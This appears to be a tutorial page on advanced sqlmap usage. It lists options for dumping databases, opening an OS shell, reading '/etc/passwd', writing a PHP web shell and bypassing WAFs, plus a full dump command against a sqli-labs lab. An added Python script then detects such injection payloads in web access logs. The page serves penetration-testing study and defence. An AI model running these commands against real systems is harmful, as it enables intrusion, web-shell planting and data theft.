Advanced sqlmap Usage




-D -T -C --dump       # Get all data
--batch               # Automatic injection attack
--users               # Get database user
--is-dba              # Check whether the user is an administrator
--current-db          # View the current database
--current-user        # View the current user
--roles               # Get database user
--schema              # Get database name
--tables              # Get table name
--columns             # Get field name
--os-cmd=CMD          # Execute a system command
--os-shell            # Create a shell on the other party's operating system and remotely execute system commands
--sql-shell           # Create a SQL shell
--sql-query=QUERY     # Execute a SQL statement
--file-read=RFILE     # Read a file from the target site. Example: --file-read='/etc/passwd'
--file-write=WFILE    # Write a file to the target site, usually combined with --sql-query. Example: --sql-query='select "one-sentence trojan"' --file-write='shell.php'
--file-dest=DFILE     # Absolute path to write to
--identify-waf        # Detect a WAF. Example: sqlmap -u <URL> --identify-waf
--tamper=unmagicquotes  # If there is a WAF, you can use a tamper script to bypass it
--skip-waf            # Skip WAF detection
--os=                 # Specify the operating system
--technique           # Specify the injection technique sqlmap uses, which saves time

If it is wide-byte injection, you need to use --tamper=unmagicquotes.

For example, to specify time-based blind injection: sqlmap -u <URL> --technique T
    B: Boolean-based blind
    Q: Inline queries
    T: Time-based blind
    U: UNION query-based
    E: Error-based
    S: Stacked queries

-p                    # Specify the parameter to test. Example: sqlmap -u 'http://127.0.0.1?id=1' -p id
--dbms=               # Specify the database to save time. Example: sqlmap -u <URL> --dbms=mysql
-v                    # Specify the verbosity level of the output. Example: sqlmap -u <URL> -v 3
    0: Only display Python tracebacks, error messages [ERROR] and critical messages [CRITICAL]
    1: Also display general information [INFO] and warnings [WARNING]
    2: Also display debugging information [DEBUG]
    3: Also display the payloads used for injection
    4: Also display HTTP requests
    5: Also display HTTP response headers
    6: Also display the HTTP response body
--level               # Test level, 1-5, default 1. The higher the level, the more payloads and the slower the scan.
    level 2: cookie
    level 3: User-Agent, Referer
    level 5: Host
--risk                # Raising the risk level increases the risk of data tampering.
    risk 2: event-based testing
    risk 3: OR statement testing
    risk 4: UPDATE testing

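The following command, run on Kali, retrieves data from sqli-labs. It specifies the parameter id, the database as MySQL, the injection technique as UNION query injection, and the database, table and column names, then uses --dump to get all the data. Left to itself, sqlmap has to detect which technique works for the injection. If you already know the technique and payload to use and specify these conditions, sqlmap runs faster.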

sqlmap -u "192.168.10.1/sqli-labs-master/Less-1/?id=1" -p id --dbms=mysql --technique=U --level 1 --risk 3 -D security -T users -C password --dump
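
Seen from the server side, a run like the one above leaves recognizable traces in the web access log. The following is an added example, not part of the original page or of sqlmap: it tags each request with the --technique letters (B, E, U, S, T) whose typical SQL keywords appear in the query string, Referer or User-Agent. The regular expressions, function names and log lines are assumptions constructed for illustration, and the "sqlmap/" User-Agent prefix is only a weak signal because the client controls that header.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Heuristic signatures keyed by the --technique letters listed above.
# Assumed patterns for illustration, not sqlmap's actual payload list.
SIGNATURES = {
    "B": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "E": re.compile(r"\b(extractvalue|updatexml)\s*\(|\bfloor\s*\(\s*rand\s*\(", re.I),
    "U": re.compile(r"\bunion\b(\s+all)?\s+select\b|\border\s+by\s+\d+", re.I),
    "S": re.compile(r";\s*(select|insert|update|delete|drop)\b", re.I),
    "T": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
}
# Combined log format: ip - - [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "([^"]*)" "([^"]*)"')

def classify(line):
    """Return source IP, matched technique letters and default-UA flag, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, referer, agent = m.groups()
    # --level 3 and above also tests User-Agent and Referer, so scan those headers too.
    fields = [unquote_plus(f) for f in (urlsplit(target).query, referer, agent)]
    hits = {k for k, rx in SIGNATURES.items() if any(rx.search(f) for f in fields)}
    return {"ip": ip, "techniques": hits, "default_ua": agent.lower().startswith("sqlmap/")}

def summarize(lines):
    """Group suspicious requests per source IP."""
    report = {}
    for r in filter(None, map(classify, lines)):
        if r["techniques"] or r["default_ua"]:
            e = report.setdefault(r["ip"], {"techniques": set(), "default_ua": False, "requests": 0})
            e["techniques"] |= r["techniques"]
            e["default_ua"] |= r["default_ua"]
            e["requests"] += 1
    return report

# Constructed sample lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs-master/Less-1/?id=1%27%20ORDER%20BY%204--%20- HTTP/1.1" 200 721 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli-labs-master/Less-1/?id=-1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- HTTP/1.1" 200 698 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.9 - - [01/Jan/2024:10:05:10 +0000] "GET /sqli-labs-master/Less-1/?id=1%27%20AND%20SLEEP(5)--%20- HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Jan/2024:10:06:00 +0000] "GET /sqli-labs-master/Less-1/?id=2 HTTP/1.1" 200 655 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(ip, sorted(entry["techniques"]), entry["default_ua"], entry["requests"])
```

Matches are leads for review rather than proof of injection. The fix on the application side remains parameterized queries for the id parameter.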


